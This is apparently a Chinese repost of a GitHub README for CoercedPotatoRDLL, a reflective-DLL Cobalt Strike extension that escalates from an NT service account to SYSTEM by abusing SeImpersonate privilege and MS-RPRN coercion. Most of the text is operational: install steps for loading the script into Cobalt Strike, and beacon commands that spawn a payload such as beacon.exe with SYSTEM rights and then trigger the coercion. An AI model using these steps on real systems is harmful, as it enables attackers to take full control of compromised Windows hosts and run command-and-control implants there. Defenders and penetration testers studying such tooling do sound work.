使用 SeImpersonateToken 权限和 MS-RPRN 函数将权限从 NT 服务升级到 SYSTEM。
很大程度上基于https://github.com/Prepouce/CoercedPotato
来自https://github.com/stephenfewer/ReflectiveDLLInjection的反射加载器。
安装
克隆此存储库并在 VisualStudio 中编译项目,然后加载dist/coercedpotato.cna 到 CobaltStrike 中。
用法
您首先需要使用以下命令生成 RPC 侦听器
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
例如
beacon> CoercedPotato spawn C:WindowsTempbeacon.exe
beacon> CoercedPotato spawn C:WindowsTemploader.exe C:WindowsTempbeacon.bin
然后你可以触发系统调用
beacon> CoercedPotato coerce
项目地址:
https://github.com/sokaRepo/CoercedPotatoRDLL
原文始发于微信公众号(Ots安全):使用 SeImpersonateToken 权限从 NT 服务到 SYSTEM 的反射 DLL
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论